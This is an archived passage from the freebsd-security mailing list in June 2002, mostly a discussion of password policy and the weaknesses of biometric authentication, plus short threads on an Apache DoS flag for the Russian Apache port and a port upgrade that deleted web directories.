memory. Poetry is one of them. Most people can memorize a few lines of poetry (or a song) rather easily. Increase the length of their passwords to 10+ and then tell them how generate them: Take a line of poetry or a line from a song and make an acronym from it. For example, I had to memorize a silly poem in 6th grade that I have never been able to forget: "The reason for the Pelican is difficult to see His beak is clearly larger than there's any need to be" The poem is actuall much longer (and I remember the whole flippin thing), but just those two lines give me "trftpidtshbiclttantb" as a password, 20 characters, and while I don't know for sure, it would seem to me that there's more entropy in that than in any "word" password. Most people already have dozens of songs memorized, so it works. This is more of a "stupid human trick" than brave new technology, but it may be helpful to you. > The best I've come up with so far is to issue random passwords, from > an array of 68 possible characters (alpha num and some easily-typed > symbols). I issue two passwords for each user. One is short enough to > be remembered with a small effort (6 characters, entropy > 2^36, > assuming my randomizer is up to par). The second password is longer > (10 characters, > 2^60), and is designed to be printed on a small card > that the user carries with them like a token or a key. Obviously, you > could argue the merits of shorter vs. longer keys. My choices are > still quite arbitrary at this stage. New passwords would be issued at > regular intervals. (Remember, these are staff members. I can do that. > :-) Actually, that's an excellent procedure. Looks like you've already done most of your homework. I'm assuming that you've already looked into these other issues, but just in case: Monitor everything. Disable accounts that experience x successive unsuccessful logins Obviously, you have some *serious* security concerns. > So, the idea is that a much better overall entropy is obtained, like > using a secret password plus a physical key. The unlikely worst case: > an attacker knows this system (password length and character set), > physically mugs a user, is able to obtain the system password hash, > AND has the resources to brute force the remaining 6 character > remembered secret. This still gives the staff member several hours to > change his or her password if he/she suspects the key was compromised. I wouldn't be worried about folks getting mugged, so much as someone being lazy with the security of their system password hash. In this case, an account disabling policy will help, because the account will be disabled before the cracker can brute force it. Many folks will expose their password to others out of laziness and never really notice it. (Just do an experiment and stand behind 5 people while they're logging in and see how many actually hide what they're typing from you.) Another issue is user education. If security is that critical to your network, I would implement a mandatory user education program. Use it to: 1. Explain what's going on and how it works. 2. Instruct on best practices. 3. Scare the crap out of them. > I know that people *want* to re-use their favorite dictionary > password(s)... so there will be *some* resistance to a system like the > above... You might be able to use the poetry method above to ease things. > I'm not really interested in a "passwords are bad" debate, unless > there are readily available technologies of which I'm not aware that > can be deployed across many dumb insecure computers across an insecure > network. Passwords are fine, users are bad ;) -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 6:52:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 3A98037B408; Wed, 19 Jun 2002 06:52:07 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id B9B56D; Wed, 19 Jun 2002 08:52:06 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5JDq6JI019640; Wed, 19 Jun 2002 08:52:06 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5JDpukV019639; Wed, 19 Jun 2002 08:51:56 -0500 (CDT) Date: Wed, 19 Jun 2002 08:51:56 -0500 From: "Jacques A. Vidrine" To: Maxim Sobolev Cc: security@FreeBSD.org, Alexandr Kovalenko , demon@FreeBSD.org, lev@serebryakov.spb.ru Subject: Re: [Fwd: Russian Apache is not vulnerable to recent DoS] Message-ID: <20020619135156.GA19379@madman.nectar.cc> References: <3D1079D3.2BCF833F@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D1079D3.2BCF833F@FreeBSD.org> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 19, 2002 at 03:32:19PM +0300, Maxim Sobolev wrote: > Redirect to a proper place. Thanks, Maxim! > -------- Original Message -------- > Subject: Russian Apache is not vulnerable to recent DoS > Date: Wed, 19 Jun 2002 15:01:11 +0300 > From: Alexandr Kovalenko > To: freebsd-ports@FreeBSD.org > > Russian Apache is not vulnerable to recent apache vulnerability, > because > it does not use code, which causes it. Please, remove FORBIDDEN from > russian/apach13 and russian/apache13-ssl. Do you a pointer to an analysis that leads to this conclusion? If the maintainers are convinced, then they can remove FORBIDDEN. I'm cc:ing them so that they are in the loop. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 7:20:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from laptop.tenebras.com (laptop.tenebras.com [66.92.188.18]) by hub.freebsd.org (Postfix) with SMTP id 9D0D837B412 for ; Wed, 19 Jun 2002 07:20:27 -0700 (PDT) Received: (qmail 12546 invoked from network); 19 Jun 2002 14:20:25 -0000 Received: from sapphire.tenebras.com (HELO tenebras.com) (66.92.188.241) by 0 with SMTP; 19 Jun 2002 14:20:25 -0000 Message-ID: <3D109329.8050007@tenebras.com> Date: Wed, 19 Jun 2002 07:20:25 -0700 From: Michael Sierchio User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020607 X-Accept-Language: en-us, en, fr-fr, ru MIME-Version: 1.0 To: Dag-Erling Smorgrav Cc: Eric F Crist , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > 1) Biometrics can't be used reliably for remote access. There are zero-knowledge protocols for secure remote use of biometric data. > 2) I don't know of any currently available biometric authentication > device that can't be easily fooled. Somewhat misleading -- any biometric method of identification has false positives and false negatives. For software engineers, this seems unacceptable, since we're used to boolean values for Truth. It's very useful for two-factor (or n-factor) authentication -- I have no idea how extensive your familiarity with biometric methods is, but several are quite promising. Some of the better ones (hand geometry) aren't suited to embedding in a laptop... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 7:38:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id 8A0EC37B401; Wed, 19 Jun 2002 07:38:09 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6RKH; Wed, 19 Jun 2002 17:40:13 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5JEc7b34423; Wed, 19 Jun 2002 17:38:07 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D109786.F6CC57B7@FreeBSD.org> Date: Wed, 19 Jun 2002 17:39:02 +0300 From: Maxim Sobolev Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: "Jacques A. Vidrine" Cc: security@FreeBSD.org, Alexandr Kovalenko , demon@FreeBSD.org, lev@serebryakov.spb.ru Subject: Re: [Fwd: Russian Apache is not vulnerable to recent DoS] References: <3D1079D3.2BCF833F@FreeBSD.org> <20020619135156.GA19379@madman.nectar.cc> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Jacques A. Vidrine" wrote: > > On Wed, Jun 19, 2002 at 03:32:19PM +0300, Maxim Sobolev wrote: > > Redirect to a proper place. > > Thanks, Maxim! > > > -------- Original Message -------- > > Subject: Russian Apache is not vulnerable to recent DoS > > Date: Wed, 19 Jun 2002 15:01:11 +0300 > > From: Alexandr Kovalenko > > To: freebsd-ports@FreeBSD.org > > > > Russian Apache is not vulnerable to recent apache vulnerability, > > because > > it does not use code, which causes it. Please, remove FORBIDDEN from > > russian/apach13 and russian/apache13-ssl. > > Do you a pointer to an analysis that leads to this conclusion? Some information is available here: http://www.lucky.net/~netch/tmp/apache-chunking-bugtraq.txt. -Maxim > > If the maintainers are convinced, then they can remove FORBIDDEN. > I'm cc:ing them so that they are in the loop. > > Cheers, > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 7:58:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 530B737B401 for ; Wed, 19 Jun 2002 07:58:46 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 55F185361; Wed, 19 Jun 2002 16:58:44 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Michael Sierchio Cc: Eric F Crist , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com> From: Dag-Erling Smorgrav Date: 19 Jun 2002 16:58:43 +0200 In-Reply-To: <3D109329.8050007@tenebras.com> Message-ID: Lines: 30 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Michael Sierchio writes: > Dag-Erling Smorgrav wrote: > > 1) Biometrics can't be used reliably for remote access. > There are zero-knowledge protocols for secure remote use of > biometric data. Most fingerprint scanners don't even encrypt the data they send to the computer they're connected to. > > 2) I don't know of any currently available biometric authentication > > device that can't be easily fooled. > Somewhat misleading -- any biometric method of identification > has false positives and false negatives. For software engineers, > this seems unacceptable, since we're used to boolean values > for Truth. When "false positives" includes reliably identifying a laptop showing an AVI of a talking person (for one facial recognition system I know of) or a plastic bag filled with warm water (for one fingerprint scanner I know of) as the rightful user, they fall under my definition of "useless". I know of two independent studies in which all the biometric devices tested (about a dozen in each study, with some overlap) were fooled with very simple means. The only biometric authentication system I trust (to some degree, anyway) is the human brain. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8: 9: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from clever.eusc.inter.net (clever.eusc.inter.net [213.73.101.4]) by hub.freebsd.org (Postfix) with ESMTP id 09F3E37B48B for ; Wed, 19 Jun 2002 08:07:56 -0700 (PDT) Received: from m023-szombathely.dial.elender.hu ([212.108.216.23] helo=ebizlab.hit.bme.hu) by clever.eusc.inter.net with esmtp (Exim 3.36 #1) id 17Kh3p-0000FX-00; Wed, 19 Jun 2002 17:07:54 +0200 Message-ID: <3D109F35.9080106@ebizlab.hit.bme.hu> Date: Wed, 19 Jun 2002 17:11:49 +0200 From: Bognar Attila User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530 X-Accept-Language: en-us, en, hu, fr MIME-Version: 1.0 To: Michael Sierchio Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, > It's very useful for two-factor (or n-factor) authentication -- > I have no idea how extensive your familiarity with biometric > methods is, but several are quite promising. Some of the better > ones (hand geometry) aren't suited to embedding in a laptop... The fact that biometric scanners are getting better and better does not mean that the applications using biometrics are good enough. There are two big problems: privacy and the fact that you have only 10 fingers, 2 hands... (the biometric patterns are quite "precious", they should be handled with _very_ big care - an encrypted channel is far from being a solution for other than trivial problems). attila ps: hand geometry based identification is not one of the best biometric methods for security critical applications (where uniqueness should be very important) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:24:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id A447937B40C for ; Wed, 19 Jun 2002 08:24:16 -0700 (PDT) Received: (qmail 55103 invoked by uid 1001); 19 Jun 2002 15:24:15 -0000 Date: Wed, 19 Jun 2002 11:24:15 -0400 From: "Peter C. Lai" To: Jan Lentfer Cc: freebsd-security@freebsd.org, freebsd-ports@freebsd.org Subject: Re: Apache 1.3.26 port Message-ID: <20020619112415.A55069@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <1024460049.2166.6.camel@jan-linnb.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1024460049.2166.6.camel@jan-linnb.lan>; from Jan.Lentfer@web.de on Wed, Jun 19, 2002 at 06:14:08AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org did you use portupgrade to upgrade? portupgrading apache13 will overwrite /usr/local/www and this PR can be seen at http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/36804 On Wed, Jun 19, 2002 at 06:14:08AM +0200, Jan Lentfer wrote: > Hi, > > i am new to this list, so I don't know if this is the right place for my > comment, so please be gentle ;-) > > After reading all the mail about the apache vulnerability, today I > installed the new 1.3.26 port. The compilation, etc. went clean, I also > had to reinstall mod_php4 and mod_fastcgi until I could make apache > start. Then I found that all my subdirectories in /usr/local/data/www > were gone (deleted)!! Luckily this was on my private machine! Is this a > normal behaviour? Anyway, it's good I know it now so I will for sure > backup the directorires on my production machines > > > Regards, > > Jan Lentfer > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:32:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 0A07A37B408; Wed, 19 Jun 2002 08:32:21 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 8B31AD; Wed, 19 Jun 2002 10:32:20 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5JFWKJI039708; Wed, 19 Jun 2002 10:32:20 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5JFWKHb039707; Wed, 19 Jun 2002 10:32:20 -0500 (CDT) Date: Wed, 19 Jun 2002 10:32:20 -0500 From: "Jacques A. Vidrine" To: Maxim Sobolev Cc: security@FreeBSD.org, Alexandr Kovalenko , demon@FreeBSD.org, lev@serebryakov.spb.ru Subject: Re: [Fwd: Russian Apache is not vulnerable to recent DoS] Message-ID: <20020619153220.GA39647@madman.nectar.cc> References: <3D1079D3.2BCF833F@FreeBSD.org> <20020619135156.GA19379@madman.nectar.cc> <3D109786.F6CC57B7@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D109786.F6CC57B7@FreeBSD.org> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 19, 2002 at 05:39:02PM +0300, Maxim Sobolev wrote: > Some information is available here: > http://www.lucky.net/~netch/tmp/apache-chunking-bugtraq.txt. Ah, I had missed that message. Thanks for the pointer. I haven't seen a response yet. If I get time I will look at it myself, but I am loathe to `de-FORBIDDEN' it with the current information. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:34:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 37D2937B40A; Wed, 19 Jun 2002 08:34:38 -0700 (PDT) Received: from [80.129.121.242] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.60 #1) id 17KhTh-00069h-00; Wed, 19 Jun 2002 17:34:37 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 3D06626B; Wed, 19 Jun 2002 17:34:35 +0200 (CEST) Received: by floundjan.homeip.net (Postfix on FreeBSD 4.5, from userid 80) id 13ED1E0; Wed, 19 Jun 2002 17:34:32 +0200 (CEST) Received: from 192.168.0.26 ( [192.168.0.26]) as user jan@localhost by www-mail.lan with HTTP; Wed, 19 Jun 2002 17:34:31 +0200 Message-ID: <1024500871.3d10a487acc8e@www-mail.lan> Date: Wed, 19 Jun 2002 17:34:31 +0200 From: Jan Lentfer Cc: freebsd-security@freebsd.org, freebsd-ports@freebsd.org Subject: Re: Apache 1.3.26 port References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619112415.A55069@cowbert.2y.net> In-Reply-To: <20020619112415.A55069@cowbert.2y.net> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 / FreeBSD-4.5 X-Originating-IP: 192.168.0.26 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Zitat von "Peter C. Lai" : > did you use portupgrade to upgrade? No, just "make all install clean" Jan ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:39:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D79F437B413 for ; Wed, 19 Jun 2002 08:39:54 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id A223C5361; Wed, 19 Jun 2002 17:39:52 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Michael Sierchio Cc: Eric F Crist , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com> From: Dag-Erling Smorgrav Date: 19 Jun 2002 17:39:52 +0200 In-Reply-To: Message-ID: Lines: 16 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav writes: > [...] I know of two independent studies in which all the > biometric devices tested (about a dozen in each study, with some > overlap) were fooled with very simple means. Here's a transcript of one of them: http://cryptome.org/gummy.htm The other was an article in c't with a somewhat broader scope: http://www.heise.de/ct/english/02/11/114/ DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:43:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 9DB4637B40E for ; Wed, 19 Jun 2002 08:43:06 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5JFcQ9g045669; Wed, 19 Jun 2002 11:38:27 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Ryan Thompson'" Cc: Subject: RE: Password security Date: Wed, 19 Jun 2002 10:42:15 -0500 Message-ID: <002101c217a7$e3c28ab0$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020618225214.L74293-100000@ren.sasknow.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey Ryan, The only other thing I could suggest is a dial-up callback system. Windows NT 4.0 and above fully support this in their base installs, and I'm sure it wouldn't be hard to setup on a FreeBSD network to do something similar. The way it works is this: User requests login authority from their remote system. He/she does so with a username/password combination. Remote network sees request, looks information up in a database and either calls back via a dial-up connection, or replies only on an IP address registered with the system. This way, it is your network that is bringing the connection up. It also restricts where users can log in from. (i.e. areas you, as network admin, deem secure). HTH Just curious, what kinds of things are you trying to secure that the basic password system hasn't worked for you? Most users are too ignorant (not their fault) to know how to do anything with their logins to hurt anything, as if your system *is* secure enough, biometrics or SecurID is a viable alternative. I personally have done work for people like the Minnesota Dept of Agriculture in this area for building and network security, and it has worked wonderfully for the last 4 years. Just curiousity on my part. ;) Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Ryan Thompson Sent: Wednesday, June 19, 2002 12:05 AM To: Eric F Crist Cc: freebsd-security@FreeBSD.ORG Subject: RE: Password security Hi Eric, Eric F Crist wrote to 'Ryan Thompson' and freebsd-security@FreeBSD.ORG: > Have you explored the idea of biometrics? Yes. Bad idea. I knew someone would suggest that. My original post was too long already to include biometrics, so, since you asked, here it is. :-) > It requires a piece of hardware on each computer that is going to > access the network, but the way you're making your security > requirements sound, the security benefit is worth the cost. Depending on the metric somewhat, collecting biometrics on insecure systems is a serious security risk. Hardware costs aside (about 20 terminals, a few of which are home systems not even owned by the company), it's far too easy to replay biometrics if the end system isn't secure... and, last time I checked, most of my employees had only 10 fingers each. Once those are gone, what then? Eyeballs? :-) So, on a lot of levels, biometrics are not an option. So, let's stick with password security for now. :-) > Eric F Crist > President/Sys Admin > AdTech Integrated Systems, Inc > http://www.adtechintegrated.com -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:52: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 3317F37B409 for ; Wed, 19 Jun 2002 08:51:53 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5JFlD9g045731; Wed, 19 Jun 2002 11:47:13 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Michael Sierchio'" , "'Dag-Erling Smorgrav'" Cc: "'Ryan Thompson'" , Subject: RE: Password security Date: Wed, 19 Jun 2002 10:51:01 -0500 Message-ID: <002201c217a9$1daf1300$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <3D109329.8050007@tenebras.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm not advocating biometrics 100% here, I was simply offering another solution to Ryan's problem. I've used biometrics in government situations, where the budget will support it (State of MN), but most companies cannot support the cost of a high quality biometric device. Of course the technology is not perfect. Things such as cuts on your finger and blood-shot eyes can still fool these systems, but password technology has its faults too. It is possible to break into any system, given the time to do you homework. Password systems with a username token is the easiest to crack. I simply need two pieces of information, and voila, I'm in. when you couple that with a specific host requirement, I have to then spoof an IP address or some other token. Biometrics, on the other hand, requires a little more work. If you couple basic username/password token systems, a hardware or address token, such as I-button/smart card and IP address, with either a retinal scanner or palm print, or finger print, or voice recognition, there becomes a greater amount of homework to be done to break into the system. Keep in mind, this is just my opinion. I'm awaiting your retorts. ;) Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: Michael Sierchio [mailto:kudzu@tenebras.com] Sent: Wednesday, June 19, 2002 9:20 AM To: Dag-Erling Smorgrav Cc: Eric F Crist; 'Ryan Thompson'; freebsd-security@FreeBSD.ORG Subject: Re: Password security Dag-Erling Smorgrav wrote: > 1) Biometrics can't be used reliably for remote access. There are zero-knowledge protocols for secure remote use of biometric data. > 2) I don't know of any currently available biometric authentication > device that can't be easily fooled. Somewhat misleading -- any biometric method of identification has false positives and false negatives. For software engineers, this seems unacceptable, since we're used to boolean values for Truth. It's very useful for two-factor (or n-factor) authentication -- I have no idea how extensive your familiarity with biometric methods is, but several are quite promising. Some of the better ones (hand geometry) aren't suited to embedding in a laptop... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 9:20: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id BE5E237B40C for ; Wed, 19 Jun 2002 09:19:57 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 62A105361; Wed, 19 Jun 2002 18:19:54 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Eric F Crist" Cc: "'Michael Sierchio'" , "'Ryan Thompson'" , Subject: Re: Password security References: <002201c217a9$1daf1300$77fe180c@armageddon> From: Dag-Erling Smorgrav Date: 19 Jun 2002 18:19:54 +0200 In-Reply-To: <002201c217a9$1daf1300$77fe180c@armageddon> Message-ID: Lines: 47 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Eric F Crist" writes: > Of course the technology is not perfect. Things such as cuts on your > finger and blood-shot eyes can still fool these systems, but password > technology has its faults too. These are false negatives, which are annoying but tolerable. I'm more worried about false positives, and from what I can see they're far too easy to provoke. > Biometrics, on the other hand, requires a little more work. If you > couple basic username/password token systems, a hardware or address > token, such as I-button/smart card and IP address, with either a retinal > scanner or palm print, or finger print, or voice recognition, there > becomes a greater amount of homework to be done to break into the > system. Not when the biometric device is so easy to fool that it becomes practically irrelevant. Then the "passwords & fingerprints" scheme is reduced to just "passwords & warm fuzzy feelings". It has been shown empirically that "state of the art" biometric devices can be fooled by any amateur with a little ingenuity and less than $50 in supplies. Some fingerprint scanners are so bad they can be tricked into scanning and accepting the latent print left on their surface from the previous time they were used. Others will accept an 